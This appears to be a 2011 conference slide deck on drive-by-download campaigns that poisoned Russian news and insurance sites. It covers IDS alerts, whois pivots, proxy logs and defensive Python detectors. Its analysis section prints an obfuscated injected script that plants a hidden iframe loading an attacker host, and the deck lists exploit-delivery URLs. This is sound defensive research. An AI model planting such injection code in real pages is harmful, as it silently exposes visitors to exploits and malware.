Drive-By-Download Attack Evolution
Before and After Vulnerability Disclosure

Vladimir B. Kropotov
TBINFORM (TNK-BP Group)
Drive-By-Download
• Hackers distribute malware by "poisoning" legitimate websites
• Hacker injects malicious iframes into HTML content
• Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc. used by attacker

You just want information about insurance, nothing more, but…
What does it look like?
[Diagram: PC connected to the Internet → Known server with iframe → Intermediate server controlled by attacker → Exploit server controlled by attacker → Malware server controlled by attacker. Labelled flows: "OS, browser plugins, etc. INFO" sent from the PC; "Exploit" returned by the exploit server; "Host ready"; "Malware" delivered by the malware server.]
How we find it?
Date/Time           2011-08-05 10:44:53 YEKST
Tag Name            PDF_XFA_Script
Observance Type     Intrusion Detection
Cleared Flag        false
Target IP Address   10.X.X.X
Target Object Name  9090
Target Object Type  Target Port
Target Service      unknown
Source IP Address   10.X.X.Y
SourcePort Name     2359
compressed          zlib
server              total.logeater.org
URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
DOES USER NEED IT??
First indicators
Date/Time    2011-07-26 11:24:37
Tag Name     PDF_XFA_Script
arg          3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed   zlib
server       mamjhvbw.dyndns.pro
URL          /ghqlv3ym/
First indicators
Date/Time    2011-08-16 13:24:44
Tag Name     ActiveX_Warning
clsid        CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server       skipetar.in
URL          /jb/pda.js

Date/Time    2011-08-18 19:00:13
Tag Name     ActiveX_Warning
clsid        CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server       e1in.in
URL          /stat/574a353789f/pda.js
First indicators
Date/Time    2011-08-09 10:17:14
Tag Name     PDF_XFA_Script
arg          host=http://inaptly.in&b=486def4
compressed   gzip
server       inaptly.in
URL          /jb/lastrger.php

Date/Time    2011-08-14 14:06:28
Tag Name     PDF_XFA_Script
arg          host=http://oligist.in&b=486def4
compressed   gzip
server       oligist.in
URL          /jb/lastrger.php

Date/Time    2011-08-18 19:00:13
Tag Name     PDF_XFA_Script
arg          host=http://e1in.in/stat&u=root
compressed   zlib
server       e1in.in
URL          /stat/574a353789f/lastrger.php
Example: o-strahovanie.ru, Sep 02
Injected script (follows the "/ ============ bbb ============" marker in the page source):

document.xmlSettings.if_ik=false;
if(window.localStorage){
  if(window.localStorage.if_ik){
    if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time())
      document.xmlSettings.if_ik=true;
  }else
    document.xmlSettings.if_ik=true;
}else{// 4 osel
  if(document.xmlSettings.getCookie('if_ik')){
    if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time())
      document.xmlSettings.if_ik=true;
  }else
    document.xmlSettings.if_ik=true;
}
if(document.xmlSettings.if_ik){
  if(window.localStorage) window.localStorage.if_ik=document.xmlSettings.time();
  else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{expires:(document.xmlSettings.time() + 86400*365)});
  document.xmlSettings.iframe=document.createElement('iframe');
  document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
  document.body.appendChild(document.xmlSettings.iframe);
  document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
}

Cookie left on the victim: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
Example: o-strahovanie.ru
Decoded from the concatenated literals:
iframe.src='http://disregarding.in/xtqd2/08.php'
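A static check for the injection pattern on this slide, added here as a defender-side example (not code from the deck): it folds runs of short string literals back into one URL and reports any URL assigned to an iframe that the same script styles as a 1px, off-screen box. The sample script is constructed from the slide's injected block; the regexes are heuristics, not a JavaScript parser.

```python
"""Static detector for split-literal URLs loaded into a hidden iframe."""
import re

# One JS string literal, single- or double-quoted, without escaped quotes.
_STR = r"'[^'\\]*'|\"[^\"\\]*\""
# Two or more literals glued together with '+', e.g. 'htt'+'p://'+'x.i'+'n'.
_CONCAT = re.compile(rf"(?:{_STR})(?:\s*\+\s*(?:{_STR}))+")
# Style fragments that make an element invisible to the user.
_HIDDEN_STYLE = re.compile(
    r"(?:height|width)\s*:\s*[01]px"
    r"|(?:left|top)\s*:\s*-\d{3,}px"
    r"|visibility\s*:\s*hidden"
    r"|display\s*:\s*none",
    re.I,
)
# '...iframe....src = <literal>' inside a single statement (no ';' crossed).
_IFRAME_SRC = re.compile(rf"iframe[^;]*?\.src\s*=\s*({_STR})")
_URL = re.compile(r"https?://[^\s'\"<>]+", re.I)


def fold_literals(js: str) -> str:
    """Replace every 'a'+'b'+'c' run with one literal 'abc' so split URLs reappear."""
    def join(m: re.Match) -> str:
        text = "".join(p[1:-1] for p in re.findall(_STR, m.group(0)))
        quote = '"' if "'" in text else "'"
        return quote + text + quote
    return _CONCAT.sub(join, js)


def hidden_iframe_urls(js: str) -> list:
    """URLs assigned to an iframe .src in a script that also hides an element by style."""
    folded = fold_literals(js)
    if not _HIDDEN_STYLE.search(folded):
        return []
    found = []
    for m in _IFRAME_SRC.finditer(folded):
        url = m.group(1)[1:-1]
        if _URL.fullmatch(url) and url not in found:
            found.append(url)
    return found


# Constructed sample: the iframe-building part of the injected block on this slide.
SAMPLE_INJECTION = """
if(document.xmlSettings.if_ik){
  document.xmlSettings.iframe=document.createElement('iframe');
  document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
  document.body.appendChild(document.xmlSettings.iframe);
  document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
}
"""

# Constructed benign control: a normally sized embed with an unsplit URL.
SAMPLE_BENIGN = "var f=document.createElement('iframe');f.src='http://example.com/video';"

if __name__ == "__main__":
    print(hidden_iframe_urls(SAMPLE_INJECTION))  # ['http://disregarding.in/xtqd2/08.php']
    print(hidden_iframe_urls(SAMPLE_BENIGN))     # []
```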
Drive By Download o-strahovanie.ru Sep 02
[Diagram, same layout as "What does it look like?": PC connected to the Internet → Known server with iframe → Intermediate server disregarding.in. Exploit server: NO. Malware server: NO.]
Drive By Download o-strahovanie.ru Sep 12
[Diagram, same layout: PC connected to the Internet → Known server with iframe → Intermediate server disregarding.in → Exploit server chamberwoman.in / janiculum.in → Malware server chamberwoman.in / janiculum.in.]
Example: o-strahovanie.ru
Domain Name: DISREGARDING.IN
Created On: 14-Jul-2011 11:09:59 UTC
Registrant Name: Russell Rosario
Registrant Street1: 136 Oakdale Avenue
City: Winter Haven
Registrant Country: US
Email: russellsrosario@teleworm.com
Name Server: NS1.PRIDES.ME
Name Server: NS2.PRIDES.ME

Domain Name: JANICULUM.IN, CHAMBERWOMAN.IN
Created On: 12-Sep-2011 08:14 UTC
Registrant Name: Russell Rosario
Example: o-strahovanie.ru
DISREGARDING.IN created 14-Jul-2011 11:09:59 UTC; JANICULUM.IN and CHAMBERWOMAN.IN created 12-Sep-2011 08:14 UTC; Registrant Name for all three: Russell Rosario.

No Payload, because No Payload Requests?
Are they looking for customers?
Example: o-strahovanie.ru
Domain ID: D5165642-AFIN
Domain Name: DISREGARDING.IN
Created On: 14-Jul-2011 11:09:59 UTC
Registrant Name: Russell Rosario
Registrant Street1: 136 Oakdale Avenue
City: Winter Haven
Registrant Country: US
Email: russellsrosario@teleworm.com
Name Server: NS1.PRIDES.ME
Name Server: NS2.PRIDES.ME

Russell Rosario
Domain Name: FILTRATED.IN
Created On: 14-Jul-2011 11:09:53 UTC
Sponsoring Registrar: Directi Web Services Pvt. Ltd. (R118-AFIN)
Registrant ID: TS_16731618
Registrant Name: Russell Rosario
Registrant Street1: 136 Oakdale Avenue
Registrant City: Winter Haven
Registrant State/Province: Florida
Registrant Postal Code: 33830
Registrant Country: US
Registrant Phone: +1.8635571308
Email: russellsrosario@teleworm.com

Other domains of the same registrant, created within seconds of each other:
filtrated.in
Created On: 14-Jul-2011 11:09:56 UTC
raptnesses.in
Created On: 14-Jul-2011 11:09:56 UTC
tansies.in
Created On: 14-Jul-2011 11:10:03 UTC
 But Sally Doesn't Know…
Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical servers location by IP-Address:
  Romania
• Responsible person: Russell Rosario
• Domains are new
Domain owner is the same
Domain Name      Created On                 Registrant Name
irrefutably.in   15-Jul-2011 11:00:21 UTC   Russell Rosario
comprador.in     25-Jul-2011 05:59:54 UTC   Russell Rosario
hyalines.in      29-Jul-2011 09:39:33 UTC   Russell Rosario
suffrago.in      01-Aug-2011 05:35:12 UTC   Russell Rosario
ruritanian.in    01-Aug-2011 05:35:50 UTC   Russell Rosario
20-Jul-2011: Acrobat vulnerability, vendor notified
Vulnerabilities reported to the vendor on that date:
VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
-----------------------------
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure

 ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory

ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
Harvesting machine started
Domain Name        Created On                 Registrant Name
microdrili.in      05-Aug-2011 07:13:08 UTC   Russell Rosario
oligist.in         05-Aug-2011 07:13:12 UTC   Russell Rosario
provost.in         05-Aug-2011 07:13:18 UTC   Russell Rosario
vaginalitis.in     05-Aug-2011 07:13:25 UTC   Russell Rosario
kremlinology.in    05-Aug-2011 07:13:35 UTC   Russell Rosario
invariance.in      05-Aug-2011 07:13:41 UTC   Russell Rosario
alleghenian.in     05-Aug-2011 07:13:48 UTC   Russell Rosario
dandifies.in       05-Aug-2011 07:14:06 UTC   Russell Rosario
xenophoby.in       05-Aug-2011 07:14:09 UTC   Russell Rosario
alliaria.in        05-Aug-2011 07:14:15 UTC   Russell Rosario
skipetar.in        05-Aug-2011 07:14:21 UTC   Russell Rosario
inaptly.in         05-Aug-2011 07:15:05 UTC   Russell Rosario
allhallowtide.in   05-Aug-2011 07:15:20 UTC   Russell Rosario
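The registrant pivot the two whois tables invite, written out as an added example (not the deck's tooling): group domains by registrant, find bursts of registrations inside a short window, and check which hosts from the IDS indicators fall inside such a burst. The rows are copied from the slides; the 10-minute window and the threshold of five domains are assumptions to tune locally.

```python
"""Registrant pivot: burst detection over domain creation times."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

_ROW = re.compile(r"^\s*(\S+)\s+(\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}) UTC\s+(.+?)\s*$")

# Rows from the "Domain owner is the same" slide.
TABLE_JUL = """
irrefutably.in   15-Jul-2011 11:00:21 UTC   Russell Rosario
comprador.in     25-Jul-2011 05:59:54 UTC   Russell Rosario
hyalines.in      29-Jul-2011 09:39:33 UTC   Russell Rosario
suffrago.in      01-Aug-2011 05:35:12 UTC   Russell Rosario
ruritanian.in    01-Aug-2011 05:35:50 UTC   Russell Rosario
"""

# Rows from the "Harvesting machine started" slide.
TABLE_AUG05 = """
microdrili.in    05-Aug-2011 07:13:08 UTC   Russell Rosario
oligist.in       05-Aug-2011 07:13:12 UTC   Russell Rosario
provost.in       05-Aug-2011 07:13:18 UTC   Russell Rosario
vaginalitis.in   05-Aug-2011 07:13:25 UTC   Russell Rosario
kremlinology.in  05-Aug-2011 07:13:35 UTC   Russell Rosario
invariance.in    05-Aug-2011 07:13:41 UTC   Russell Rosario
alleghenian.in   05-Aug-2011 07:13:48 UTC   Russell Rosario
dandifies.in     05-Aug-2011 07:14:06 UTC   Russell Rosario
xenophoby.in     05-Aug-2011 07:14:09 UTC   Russell Rosario
alliaria.in      05-Aug-2011 07:14:15 UTC   Russell Rosario
skipetar.in      05-Aug-2011 07:14:21 UTC   Russell Rosario
inaptly.in       05-Aug-2011 07:15:05 UTC   Russell Rosario
allhallowtide.in 05-Aug-2011 07:15:20 UTC   Russell Rosario
"""


def parse_rows(text: str) -> list:
    """Parse 'domain  DD-Mon-YYYY HH:MM:SS UTC  registrant' lines into dicts."""
    rows = []
    for line in text.strip().splitlines():
        m = _ROW.match(line)
        if not m:
            continue  # skip header or malformed lines
        rows.append({"domain": m.group(1).lower(),
                     "created": datetime.strptime(m.group(2), "%d-%b-%Y %H:%M:%S"),
                     "registrant": m.group(3)})
    return rows


def registration_bursts(rows, window=timedelta(minutes=10), min_count=5):
    """Per registrant, return maximal runs of >= min_count domains whose creation
    times all lie within `window` of the run's first domain."""
    by_registrant = defaultdict(list)
    for r in rows:
        by_registrant[r["registrant"]].append(r)
    bursts = []
    for registrant, items in by_registrant.items():
        items.sort(key=lambda r: r["created"])
        i = 0
        while i < len(items):
            j = i
            while j + 1 < len(items) and items[j + 1]["created"] - items[i]["created"] <= window:
                j += 1
            if j - i + 1 >= min_count:
                bursts.append({"registrant": registrant,
                               "start": items[i]["created"], "end": items[j]["created"],
                               "domains": [r["domain"] for r in items[i:j + 1]]})
                i = j + 1  # do not report overlapping sub-runs
            else:
                i += 1
    return bursts


def link_indicators(bursts, observed_hosts) -> dict:
    """Map each IDS-observed host that sits inside a burst to that burst's start time."""
    linked = {}
    for b in bursts:
        for d in b["domains"]:
            if d in observed_hosts:
                linked[d] = b["start"]
    return linked


if __name__ == "__main__":
    found = registration_bursts(parse_rows(TABLE_JUL) + parse_rows(TABLE_AUG05))
    for b in found:
        print(b["registrant"], b["start"], b["end"], len(b["domains"]), "domains")
    # Hosts seen in the "First indicators" alerts earlier in the deck.
    print(link_indicators(found, {"inaptly.in", "skipetar.in", "oligist.in", "e1in.in"}))
```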
But may be someone knows?

• Spamlists
• AV Vendors
• Safebrowsing
• Securityfocus
Spamlists, Aug 19
AV Vendors, Aug 18
Safebrowsing Aug 20
Securityfocus Sep 07
Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange get request header in all web pages of my site? I'm worried about Trojan attack!

Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure Sep 14. What to expect?

NO GOOD NEWS, JUST EPIC FAIL for site administrators
No good news. Hundreds of domains were registered:
“New generation”
[Diagram, same layout as before: PC connected to the Internet → Known server with iframe → Intermediate server controlled by attacker → Exploit server controlled by attacker → Malware server controlled by attacker. New node: Other known server NOT controlled by attacker, reached from the intermediate server.]
Attack after public disclosure
• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
• Physical servers location by IP-Address: International
• Domains registered to different spurious persons
• Domain lifetime ~ time to Blacklists appearance
• Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique)
• If you don't know exact malware URL, site redirects to well known server
• Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
Known sites examples: RZD.RU (Russian railroads)
Just TWO Domains, SURE?
Domain                   URL
interfax-rzd.in          http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root
rzd-interfax-online.in   http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root
news-rzdstyle.in         http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root
rzd-rzd.in               http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
therzd-rzd.in            http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.in           http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root
rzd-rzdcomp.in           http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root
rzd-rzdcomp.in           http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1
press-rzd.in             http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-press.in             http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-banner.in            http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root
pass-rzd.in              http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root
rzd-ticket.in            http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root
Known sites examples: RZD.RU (Russian railroads)
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
Other examples: EG.RU (newspaper, 263 685 visits per day)
Other examples: svpressa.ru (newspaper, 276 720 visits per day)
Other examples: URA.RU (news, 22 486 visits per day)
Other examples: ria.ru (news, 667 222 visits per day)
Datetime   [09/Nov/2011:12:26:45 +0300]
Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
IP         176.9.50.178
Site       jya56yhsvcsss.com
Referrer   http://ria.ru/
Other examples: inosmi.ru (news, 175 361 visits per day)
Datetime   [09/Nov/2011:12:28:10 +0300]
Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1
IP         176.9.50.178
Site       jya56yhsvcsss.com
Referrer   http://inosmi.ru/
Other examples: glavbukh.ru (15 200 visits per day)
Datetime   [09/Nov/2011:12:14:46 +0300]
Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
IP         176.9.50.178
Site       jya56yhsvcsss.com
Referrer   http://www.glavbukh.ru/
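The cross-referrer view these three records suggest, as an added example (not the deck's tooling): one destination, same host and IP and path, fetched within minutes from pages on several unrelated, well-known sites. Each record alone looks like ordinary browsing; the correlation is the signal. The sample is constructed from the three slide records plus one benign control; the 30-minute window and the threshold of three referrer domains are assumptions.

```python
"""Cross-referrer correlation over proxy records in the layout shown on these slides."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample: the three slide records plus one benign control
# (192.0.2.10 is a documentation address, not a real server).
SAMPLE_LOG = """\
Datetime   [09/Nov/2011:12:14:46 +0300]
Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
IP         176.9.50.178
Site       jya56yhsvcsss.com
Referrer   http://www.glavbukh.ru/

Datetime   [09/Nov/2011:12:26:45 +0300]
Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.0
IP         176.9.50.178
Site       jya56yhsvcsss.com
Referrer   http://ria.ru/

Datetime   [09/Nov/2011:12:28:10 +0300]
Url        GET http://jya56yhsvcsss.com/BVRQ HTTP/1.1
IP         176.9.50.178
Site       jya56yhsvcsss.com
Referrer   http://inosmi.ru/

Datetime   [09/Nov/2011:12:30:00 +0300]
Url        GET http://ria.ru/favicon.ico HTTP/1.1
IP         192.0.2.10
Site       ria.ru
Referrer   http://ria.ru/
"""


def registered_domain(host: str) -> str:
    """Crude eTLD+1, enough for .ru/.com hosts here; use a public-suffix list in production."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def parse_records(text: str) -> list:
    """Parse blank-line separated 'Key   value' records into dicts with derived fields."""
    records = []
    for block in text.strip().split("\n\n"):
        rec = {}
        for line in block.splitlines():
            key, _, value = line.partition(" ")
            rec[key] = value.strip()
        rec["when"] = datetime.strptime(rec["Datetime"], "[%d/%b/%Y:%H:%M:%S %z]")
        # 'GET http://host/path HTTP/1.0' -> '/path'
        rec["path"] = urlsplit(rec["Url"].split()[1]).path
        rec["ref_domain"] = registered_domain(urlsplit(rec["Referrer"]).hostname or "")
        records.append(rec)
    return records


def shared_destinations(records, window=timedelta(minutes=30), min_referrers=3):
    """Flag (Site, IP) pairs reached from >= min_referrers distinct third-party
    referrer domains inside one sliding window of length `window`."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["Site"], r["IP"])].append(r)
    hits = []
    for (site, ip), recs in groups.items():
        recs.sort(key=lambda r: r["when"])
        own = registered_domain(site)
        for i, first in enumerate(recs):
            refs, paths = set(), set()
            for r in recs[i:]:
                if r["when"] - first["when"] > window:
                    break
                if r["ref_domain"] and r["ref_domain"] != own:  # ignore self-referrals
                    refs.add(r["ref_domain"])
                    paths.add(r["path"])
            if len(refs) >= min_referrers:
                hits.append({"site": site, "ip": ip, "first_seen": first["when"],
                             "referrers": sorted(refs), "paths": sorted(paths)})
                break  # one finding per destination is enough
    return hits


if __name__ == "__main__":
    for h in shared_destinations(parse_records(SAMPLE_LOG)):
        print(h["site"], h["ip"], h["paths"], "<-", ", ".join(h["referrers"]))
```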
Malware examples: Banks targeted attack
Another news, another phone…
• Legal
• Faked
Malware examples: Banks targeted attack
Malware examples: 01ie.ru, 02ie.ru, 03ie.ru (Registered by reg.ru)
Malware examples
Script examples
Sample analysis (Virus Total)
What can we do?
• Patch endpoint
• Tighten the Internet filtering (default deny if possible)
• No Internet surfing with admin rights
• See what’s happening (continuous monitoring)
• Check if you’re well (regular technical audits)
• Educate people
Credits
• Sergey V. Soldatov,
                 TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin,
                 TBINFORM (TNK-BP Group)
• Wayne Huang,
                 ARMORIZE
THE END

    Vladimir B. Kropotov
Information security analyst
 TBINFORM (TNK-BP Group)

  vbkropotov@tnk-bp.com
    kropotov@ieee.org

How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыSergey Soldatov
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationSergey Soldatov
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protectionSergey Soldatov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозыSergey Soldatov
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Sergey Soldatov
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC processSergey Soldatov
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими рукамиSergey Soldatov
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5Sergey Soldatov
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!Sergey Soldatov
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей  православной криптографииНекриптографическое исследование носителей  православной криптографии
Некриптографическое исследование носителей православной криптографииSergey Soldatov
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensourceSergey Soldatov
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDMSergey Soldatov
 

Más de Sergey Soldatov (20)

Metrics in Security Operations
Metrics in Security OperationsMetrics in Security Operations
Metrics in Security Operations
 
Сколько надо SOC?
Сколько надо SOC?Сколько надо SOC?
Сколько надо SOC?
 
От мониторинга к форенсике и обратно
От мониторинга к форенсике и обратноОт мониторинга к форенсике и обратно
От мониторинга к форенсике и обратно
 
Роботы среди нас!
Роботы среди нас!Роботы среди нас!
Роботы среди нас!
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструменты
 
Reducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformationReducing cyber risks in the era of digital transformation
Reducing cyber risks in the era of digital transformation
 
Kaspersky managed protection
Kaspersky managed protectionKaspersky managed protection
Kaspersky managed protection
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Трудовые будни охотника на угрозы
Трудовые будни охотника на угрозыТрудовые будни охотника на угрозы
Трудовые будни охотника на угрозы
 
Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016
 
Threat hunting as SOC process
Threat hunting as SOC processThreat hunting as SOC process
Threat hunting as SOC process
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Мониторинг своими руками
Мониторинг своими рукамиМониторинг своими руками
Мониторинг своими руками
 
Вопросы к DLP
Вопросы к DLPВопросы к DLP
Вопросы к DLP
 
модульный под к документир V5
модульный под к документир V5модульный под к документир V5
модульный под к документир V5
 
IDM - это непросто!
IDM - это непросто!IDM - это непросто!
IDM - это непросто!
 
Некриптографическое исследование носителей православной криптографии
Некриптографическое исследование носителей  православной криптографииНекриптографическое исследование носителей  православной криптографии
Некриптографическое исследование носителей православной криптографии
 
Opensource vs. Non-opensource
Opensource vs. Non-opensourceOpensource vs. Non-opensource
Opensource vs. Non-opensource
 
Примерные критерии оценки IDM
Примерные критерии оценки IDMПримерные критерии оценки IDM
Примерные критерии оценки IDM
 

Último

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Advanced Test Driven-Development @ php[tek] 2024
